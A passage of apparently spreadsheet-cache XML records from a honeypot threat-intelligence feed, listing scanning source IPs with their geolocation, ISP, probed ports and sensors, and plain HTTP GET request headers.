'*/*', 'Host': '109.123.229.33', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '66.94.127.183', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '94.131.113.33', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d98e:b87d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3032"/>
    <x v="3032"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T08:59:21"/>
    <d v="2025-04-05T08:59:21"/>
    <d v="2025-04-05T08:59:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Fatehgarh Sahib"/>
    <s v="Amloh"/>
    <s v="1278758"/>
    <s v="NA"/>
    <s v="30.6084"/>
    <s v="76.232"/>
    <s v="17917"/>
    <s v="QTLTELECOM-AS-AP"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7cfd:f3fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3033"/>
    <x v="3033"/>
    <s v="NA&amp;&amp;182-155-97-66.veetime.com"/>
    <x v="0"/>
    <d v="2025-04-05T08:49:37"/>
    <d v="2024-12-26T13:55:51"/>
    <d v="2025-04-05T08:49:37"/>
    <n v="354"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="23&amp;&amp;NA&amp;&amp;59990&amp;&amp;59970&amp;&amp;57672&amp;&amp;9950&amp;&amp;57685&amp;&amp;57664&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1706"/>
    <s v="120.658"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="EMAX"/>
    <s v="business"/>
    <s v="e-MAX NETWORK CORP."/>
    <s v="2011-01-17"/>
    <s v="EMAX-NET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2009-11-27 10:29:39"/>
    <s v="2027-11-27 10:29:39"/>
    <s v="2024-09-30 09:33:59"/>
    <s v="['NS1.EMAX.NET.TW', 'NS2.EMAX.NET.TW']"/>
    <s v="Net-Chinese Co., Ltd."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="14"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:b69b:6142"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3034"/>
    <x v="3034"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T08:38:48"/>
    <d v="2023-07-24T23:53:26"/>
    <d v="2025-04-05T08:38:48"/>
    <n v="1234"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5900&amp;&amp;53&amp;&amp;22&amp;&amp;389&amp;&amp;445&amp;&amp;14914&amp;&amp;23&amp;&amp;41992"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2009-09-18"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6da2:504e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3035"/>
    <x v="3035"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T08:28:58"/>
    <d v="2025-04-01T22:59:04"/>
    <d v="2025-04-05T08:28:58"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="GUA"/>
    <s v="Guanajuato"/>
    <s v="Guanajuato Municipality"/>
    <s v="Calderones"/>
    <s v="4016162"/>
    <s v="NA"/>
    <s v="20.9897"/>
    <s v="-101.226"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="residential"/>
    <s v="UNINET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.253.136.190,63825)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bdfd:88be"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3036"/>
    <x v="3036"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T08:27:47"/>
    <d v="2025-04-04T17:27:07"/>
    <d v="2025-04-05T08:27:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:478b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3037"/>
    <x v="3037"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T08:07:25"/>
    <d v="2025-04-05T08:07:25"/>
    <d v="2025-04-05T08:07:25"/>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d8:4d6e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3038"/>
    <x v="3038"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T07:46:50"/>
    <d v="2025-04-04T19:19:02"/>
    <d v="2025-04-05T07:46:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c9:b7e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3039"/>
    <x v="3039"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T07:30:04"/>
    <d v="2025-04-05T07:13:06"/>
    <d v="2025-04-05T07:30:04"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5d42"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3040"/>
    <x v="3040"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T07:27:24"/>
    <d v="2025-01-21T18:54:34"/>
    <d v="2025-04-05T07:27:24"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BT"/>
    <s v="Banten"/>
    <s v="South Tangerang"/>
    <s v="South Tangerang"/>
    <s v="8581443"/>
    <s v="NA"/>
    <s v="-6.28862"/>
    <s v="106.718"/>
    <s v="17451"/>
    <s v="BIZNET NETWORKS"/>
    <s v="BIZNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-10-27"/>
    <s v="BIZNET-AP"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7663:50e6"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3041"/>
    <x v="3041"/>
    <s v="114-34-125-149.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T07:00:53"/>
    <d v="2025-02-14T23:13:38"/>
    <d v="2025-04-05T07:00:53"/>
    <n v="187"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Xindian District"/>
    <s v="1674828"/>
    <s v="NA"/>
    <s v="24.9601"/>
    <s v="121.539"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:7d95"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3042"/>
    <x v="3042"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:02:02"/>
    <d v="2024-06-05T04:58:00"/>
    <d v="2025-04-05T06:02:02"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="32989&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Duque de Caxias"/>
    <s v="Duque de Caxias"/>
    <s v="3464374"/>
    <s v="NA"/>
    <s v="-22.7856"/>
    <s v="-43.3117"/>
    <s v="263476"/>
    <s v="V W INTERNET"/>
    <s v="V W INTERNET"/>
    <s v="business"/>
    <s v="V W INTERNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bff2:6a06"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3043"/>
    <x v="3043"/>
    <s v="59-126-185-178.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:01:50"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-05T06:01:50"/>
    <n v="481"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;55267&amp;&amp;57827&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:b9b2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3044"/>
    <x v="3044"/>
    <s v="1-34-40-99.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:01:44"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-05T06:01:44"/>
    <n v="605"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;64781&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0531"/>
    <s v="121.526"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:122:2863"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3045"/>
    <x v="3045"/>
    <s v="61-222-58-40.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T06:01:21"/>
    <d v="2024-12-15T16:13:27"/>
    <d v="2025-04-05T06:01:21"/>
    <n v="721"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
